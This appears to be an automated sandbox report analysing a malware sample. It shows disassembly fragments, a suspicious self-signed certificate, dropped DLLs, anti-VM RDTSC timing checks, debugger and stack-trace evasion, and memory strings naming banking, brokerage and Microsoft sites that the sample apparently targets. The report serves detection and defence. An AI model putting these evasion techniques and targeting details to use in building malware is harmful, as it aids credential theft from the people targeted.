Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D36B0E pushad ; iretd	11_2_04D36B11
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE96B5 push ss; ret	11_2_07BE96BF
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BEAE22 push edi; ret	11_2_07BEAE98
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE9D3D pushfd ; ret	11_2_07BE9D3E
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE5492 push esp; iretd	11_2_07BE5530
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07C00412 push edi; retf	11_2_07C00418
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BF8B42 push ss; ret	11_2_07BF8B4C
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BF08F7 pushad ; iretd	11_2_07BF08F8
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BDD0EB pushad ; iretd	11_2_07BDD0EE
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_07BE3831 pushfd ; iretd	11_2_07BE3836
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052A27FA pushad ; ret	12_2_052A27F9
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052A225F pushad ; ret	12_2_052A27F9
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052D09AD push ecx; mov dword ptr [esp], ecx	12_2_052D09B6
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052A283D push eax; iretd	12_2_052A2858
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F76310 push edi; ret	12_2_02F76386
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F685D9 pushad ; iretd	12_2_02F685DC
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F74BA3 push ss; ret	12_2_02F74BAD
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6ED1F pushfd ; iretd	12_2_02F6ED24
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F75219 pushfd ; ret	12_2_02F7522C
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F75537 push edi; ret	12_2_02F75570

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Menuetterne' is not a known legitimate company. 3) Email domain 'Udstdelse.In' appears suspicious and non-corporate. 4) Large time gap between compilation date (2016) and certificate creation (2024) suggests possible certificate manipulation. 5) The OU field contains strange text 'Superlogicality borebiller' that appears randomly generated. 6) While location claims US (Houston, Texas), the organization name and email domain suggest non-US origins, indicating potential location spoofing. 7) Certificate validation explicitly failed with untrusted root certificate error. The combination of self-signing, suspicious organization details, and validation failure strongly suggests this is a malicious certificate.

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	File created: C:\Users\user\AppData\Local\Temp\nsg95EC.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	File created: C:\Users\user\AppData\Local\Temp\nsg95EC.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	API/Special instruction interceptor: Address: 6E85C72
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	API/Special instruction interceptor: Address: 32B5C72
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424ED324
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424ED7E4
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424ED944
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424ED504
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424ED544
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424ED1E4
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424F0154
Source: C:\Windows\SysWOW64\PresentationHost.exe	API/Special instruction interceptor: Address: 7FFA424EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	RDTSC instruction interceptor: First address: 6E483EC second address: 6E483EC instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F50F87098B5h 0x00000006 cmp eax, 3CFAB7FFh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	RDTSC instruction interceptor: First address: 32783EC second address: 32783EC instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F50F92543B5h 0x00000006 cmp eax, 3CFAB7FFh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 8_2_33A2D1C0 rdtsc

8_2_33A2D1C0

Source: C:\Windows\SysWOW64\PresentationHost.exe	Window / User API: threadDelayed 481			Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Window / User API: threadDelayed 9492			Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg95EC.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg95EC.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	API coverage: 0.1 %
Source: C:\Windows\SysWOW64\PresentationHost.exe	API coverage: 2.9 %

Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe TID: 2116	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 1992	Thread sleep count: 481 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 1992	Thread sleep time: -962000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 1992	Thread sleep count: 9492 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 1992	Thread sleep time: -18984000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\PresentationHost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PresentationHost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 0_2_004064C1 FindFirstFileW,FindClose,	0_2_004064C1
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F7CC50 FindFirstFileW,FindNextFileW,FindClose,	12_2_02F7CC50

Source: 75EG3OW_L.12.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 75EG3OW_L.12.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: 75EG3OW_L.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nara Change Transaction PasswordVMware20,1169649
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,1169649*
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20l
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,116964971r
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,1@
Source: mF8WNclxnv.exe, 00000008.00000002.2286522038.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000002.2286449185.00000000039C4000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2180153393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: 75EG3OW_L.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: 75EG3OW_L.12.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: 75EG3OW_L.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x.intuit.comVMware20,11696497155t
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000336E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000D.00000002.2566109603.000001AF5E04C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: 75EG3OW_L.12.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: 75EG3OW_L.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: 75EG3OW_L.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: 75EG3OW_L.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: 75EG3OW_L.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: 75EG3OW_L.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Kf2uv5NZsp.exe, 0000000B.00000002.3425953113.00000000013DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: 75EG3OW_L.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: 75EG3OW_L.12.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: PresentationHost.exe, 0000000C.00000002.3428898470.0000000008434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ive Brokers - GDCDYNVMware20,11696497155p
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: 75EG3OW_L.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: 75EG3OW_L.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: 75EG3OW_L.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 75EG3OW_L.12.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: 75EG3OW_L.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: 75EG3OW_L.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: 75EG3OW_L.12.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: 75EG3OW_L.12.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: 75EG3OW_L.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: 75EG3OW_L.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: 75EG3OW_L.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	API call chain: ExitProcess graph end node			graph_0-4624
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	API call chain: ExitProcess graph end node			graph_0-4622

Source: C:\Windows\SysWOW64\PresentationHost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\PresentationHost.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 8_2_33A2D1C0 rdtsc

8_2_33A2D1C0

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 8_2_339F35C0 NtCreateMutant,LdrInitializeThunk,

8_2_339F35C0

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A513B9 mov eax, dword ptr fs:[00000030h]	8_2_33A513B9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A513B9 mov eax, dword ptr fs:[00000030h]	8_2_33A513B9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A513B9 mov eax, dword ptr fs:[00000030h]	8_2_33A513B9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A8539D mov eax, dword ptr fs:[00000030h]	8_2_33A8539D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D33A5 mov eax, dword ptr fs:[00000030h]	8_2_339D33A5
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E33A0 mov eax, dword ptr fs:[00000030h]	8_2_339E33A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E33A0 mov eax, dword ptr fs:[00000030h]	8_2_339E33A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6F3E6 mov eax, dword ptr fs:[00000030h]	8_2_33A6F3E6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A853FC mov eax, dword ptr fs:[00000030h]	8_2_33A853FC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C93F9 mov eax, dword ptr fs:[00000030h]	8_2_339C93F9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6B3D0 mov ecx, dword ptr fs:[00000030h]	8_2_33A6B3D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7132D mov eax, dword ptr fs:[00000030h]	8_2_33A7132D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7132D mov eax, dword ptr fs:[00000030h]	8_2_33A7132D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3930B mov eax, dword ptr fs:[00000030h]	8_2_33A3930B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3930B mov eax, dword ptr fs:[00000030h]	8_2_33A3930B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3930B mov eax, dword ptr fs:[00000030h]	8_2_33A3930B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A7330 mov eax, dword ptr fs:[00000030h]	8_2_339A7330
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DF32C mov eax, dword ptr fs:[00000030h]	8_2_339DF32C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6F367 mov eax, dword ptr fs:[00000030h]	8_2_33A6F367
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A53370 mov eax, dword ptr fs:[00000030h]	8_2_33A53370
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AD34C mov eax, dword ptr fs:[00000030h]	8_2_339AD34C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AD34C mov eax, dword ptr fs:[00000030h]	8_2_339AD34C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A85341 mov eax, dword ptr fs:[00000030h]	8_2_33A85341
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B7370 mov eax, dword ptr fs:[00000030h]	8_2_339B7370
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B7370 mov eax, dword ptr fs:[00000030h]	8_2_339B7370
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B7370 mov eax, dword ptr fs:[00000030h]	8_2_339B7370
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E329E mov eax, dword ptr fs:[00000030h]	8_2_339E329E
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E329E mov eax, dword ptr fs:[00000030h]	8_2_339E329E
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A792A6 mov eax, dword ptr fs:[00000030h]	8_2_33A792A6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A792A6 mov eax, dword ptr fs:[00000030h]	8_2_33A792A6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A792A6 mov eax, dword ptr fs:[00000030h]	8_2_33A792A6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A792A6 mov eax, dword ptr fs:[00000030h]	8_2_33A792A6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A472A0 mov eax, dword ptr fs:[00000030h]	8_2_33A472A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A472A0 mov eax, dword ptr fs:[00000030h]	8_2_33A472A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A392BC mov eax, dword ptr fs:[00000030h]	8_2_33A392BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A392BC mov eax, dword ptr fs:[00000030h]	8_2_33A392BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A392BC mov ecx, dword ptr fs:[00000030h]	8_2_33A392BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A392BC mov ecx, dword ptr fs:[00000030h]	8_2_33A392BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A85283 mov eax, dword ptr fs:[00000030h]	8_2_33A85283
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C52A0 mov eax, dword ptr fs:[00000030h]	8_2_339C52A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C52A0 mov eax, dword ptr fs:[00000030h]	8_2_339C52A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C52A0 mov eax, dword ptr fs:[00000030h]	8_2_339C52A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C52A0 mov eax, dword ptr fs:[00000030h]	8_2_339C52A0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A852E2 mov eax, dword ptr fs:[00000030h]	8_2_33A852E2
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A612ED mov eax, dword ptr fs:[00000030h]	8_2_33A612ED
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DF2D0 mov eax, dword ptr fs:[00000030h]	8_2_339DF2D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DF2D0 mov eax, dword ptr fs:[00000030h]	8_2_339DF2D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B2F0 mov eax, dword ptr fs:[00000030h]	8_2_33A5B2F0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B2F0 mov eax, dword ptr fs:[00000030h]	8_2_33A5B2F0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DB2C0 mov eax, dword ptr fs:[00000030h]	8_2_339DB2C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B92C5 mov eax, dword ptr fs:[00000030h]	8_2_339B92C5
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B92C5 mov eax, dword ptr fs:[00000030h]	8_2_339B92C5
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6F2F8 mov eax, dword ptr fs:[00000030h]	8_2_33A6F2F8
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A85227 mov eax, dword ptr fs:[00000030h]	8_2_33A85227
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E7208 mov eax, dword ptr fs:[00000030h]	8_2_339E7208
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E7208 mov eax, dword ptr fs:[00000030h]	8_2_339E7208
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7D26B mov eax, dword ptr fs:[00000030h]	8_2_33A7D26B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A7D26B mov eax, dword ptr fs:[00000030h]	8_2_33A7D26B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E724D mov eax, dword ptr fs:[00000030h]	8_2_339E724D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A9240 mov eax, dword ptr fs:[00000030h]	8_2_339A9240
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A9240 mov eax, dword ptr fs:[00000030h]	8_2_339A9240
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D9274 mov eax, dword ptr fs:[00000030h]	8_2_339D9274
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F1270 mov eax, dword ptr fs:[00000030h]	8_2_339F1270
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F1270 mov eax, dword ptr fs:[00000030h]	8_2_339F1270
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6B256 mov eax, dword ptr fs:[00000030h]	8_2_33A6B256
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6B256 mov eax, dword ptr fs:[00000030h]	8_2_33A6B256
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3D250 mov ecx, dword ptr fs:[00000030h]	8_2_33A3D250
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A65180 mov eax, dword ptr fs:[00000030h]	8_2_33A65180
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A65180 mov eax, dword ptr fs:[00000030h]	8_2_33A65180
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CB1B0 mov eax, dword ptr fs:[00000030h]	8_2_339CB1B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A07190 mov eax, dword ptr fs:[00000030h]	8_2_33A07190
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A831E1 mov eax, dword ptr fs:[00000030h]	8_2_33A831E1
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339ED1D0 mov eax, dword ptr fs:[00000030h]	8_2_339ED1D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339ED1D0 mov ecx, dword ptr fs:[00000030h]	8_2_339ED1D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A571F9 mov esi, dword ptr fs:[00000030h]	8_2_33A571F9
